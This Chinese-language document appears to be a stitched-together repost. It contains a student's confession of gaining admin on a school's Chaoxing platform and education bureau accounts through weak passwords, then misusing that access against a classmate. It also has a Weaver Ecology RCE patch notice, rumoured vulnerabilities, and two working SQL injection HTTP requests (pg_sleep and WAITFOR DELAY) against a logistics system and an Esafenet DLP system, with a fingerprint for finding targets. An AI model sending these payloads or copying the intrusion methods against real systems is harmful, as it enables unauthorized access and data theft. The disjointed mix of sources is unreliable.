【2024年了，还有人不知道踹哈？-哔哩哔哩】 https://b23.tv/AkIcswT

我是个渣男…
唉，我原本只是一个农村学校的普通学生罢了…
初三时参加一个数学冬令营通过自主招生考上了城里的重点高中（实际上水分很高…）
原以为我很厉害，充满了对城里高中的向往…可我在这个所谓的重点班只能排在倒数，我逐渐开始自卑。后来有幸接触了oi，认识了一群不错的朋友，但是我却开始沉迷于网络渗透技术。高一时，我利用一个鉴权漏洞获取了学校超星后台的管理员权限，这便是悲剧的开始。（通过弱密码获取测试机构的管理员，将我们学校管理员拉入这个机构通过后台直接重置密码…实际上没有任何技术含量）
后来，我和班上副班长起了冲突，大概是一时鬼迷心窍，我利用后台强制把她的选课改成了我们全校学生最不喜欢的老师上的课，事发之后我被停课一周。
不过…我没有吸取这次教训，继续在学校扫监控，玩门禁…后面CSP-S成绩出来…我只拿了个三等，初赛都没有过。后面具体是干什么我忘记了，只记得我当时利用同样的漏洞拿下了超星我们市教育局的管理员账号，后来事情暴露，连超星那边的人都出动了。还好他们念在我还是一个学生没有追究我的责任，现在想来真是后怕，如果当时他们报警的话我可能已经进去了。
之后的事情就是我因为监控的事情被赶回老家，此时还是我还是高一上学期的学生…
然后我开始自暴自弃，什么都不学，开始各种玩耍，把之前没有玩过的游戏狠狠的补了个痛快。
再后来就是我转入老家的高中借读，然后又因为监控的事情停课到高二下…（我真的不长教训，唉）
现在，我仍然在老家借读，真的很后悔，如果当初没有乱搞事情，如果当初没有碰网络渗透，如果当初没有参加那顶尖人才选拔计划…不过世上并没有什么后悔药，唉，现在我的人生被我搞的一团糟，我甚至都想重开（回归天空，螺旋马太）了…

【泛微一级安全通知】关于Ecology任意文件写入（RCE）漏洞的修复通知
（注意：如部署有测试环境，测试环境也记得更新安全补丁包！）

泛微如下产品功能受以上漏洞影响：
1、Ecology8.0（必须升级到10.65版本安全补丁包）
2、Ecology9.0（目前安全补丁包低于V10.62版本需要手工尽快升级）

升级方法：
方法1：等待安全包自动更新；
方法2：用sysadmin登录oa系统，访问/security/monitor/Monitor.jsp，点击【环境信息】，如果看到【下载并应用更新】，可以直接点击，然后等待几分钟后即可实现在线更新，该更新不需要重启服务。
方法3：手工停止服务打包。

以上漏洞涉及的安全补丁包可在下方页面中点击下载：

https://www.weaver.com.cn/cs/security/edm20240719_kdielfrovkewpiiuyrtewtw.html

另外目前网传情报，无官方披露通报和poc

某edr设备(信息源自abc123，可信度较高)
奇安信天擎V10服务端
深信服某设备

全是聊天记录类型的“存在漏洞”，真假自行判断

华磊科技物流-modifyInsurance-delay-pg-sql注入漏洞

body="l_c_bar"||body="l_c_center"

GET /modifyInsurance.htm?documentCode=-1&insuranceValue=-1&customerId=-1+and+1=(select+1+from+pg_sleep(6)) HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0

https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6

1Panel SQL 注入致远程命令执行漏洞

亿赛通数据泄露防护(DLP)系统NetSecConfigAjax SQL注入漏洞

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host: xxx.xxx
Content-Type: application/x-www-form-urlencoded

command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

福建科立讯那个是老day不是0，别传了

https://blog.csdn.net/qq_41904294/article/details/138583047